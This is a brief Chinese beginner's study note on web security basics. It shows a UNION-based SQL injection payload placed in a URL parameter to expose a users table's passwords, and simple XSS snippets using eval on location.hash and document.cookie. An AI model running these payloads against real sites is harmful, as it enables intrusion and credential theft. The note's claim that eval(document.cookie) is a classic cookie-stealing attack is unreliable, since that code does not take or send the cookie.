Web前端学习第一天

1.SQL注入攻击的发生

select username, email ,descl from users where id=1;

可能会被伪造成

1 union select password,1,1 from users

 

组成链接就成了

http://www.xxxx.com/user.php?id=1 union select password,1,1 from users

 

然后组成一个正确的SQL查询语句

select username, email ,descl from users where id=1 union select password,1,1 from users

 

与此同时就有可能泄露出users表的password的值

2.XSS跨站脚本攻击

<script>
eval(location.hash.substr(1));
</script>

一个简单的XSS攻击就形成了，在JavaScript表示动态的执行JavaScript语句

location.hash是获取URL链接中#以后的类容

substr是截取字符串的函数

<script>
eval(document.cookie);
</script>

经典的获取cookie值的XSS攻击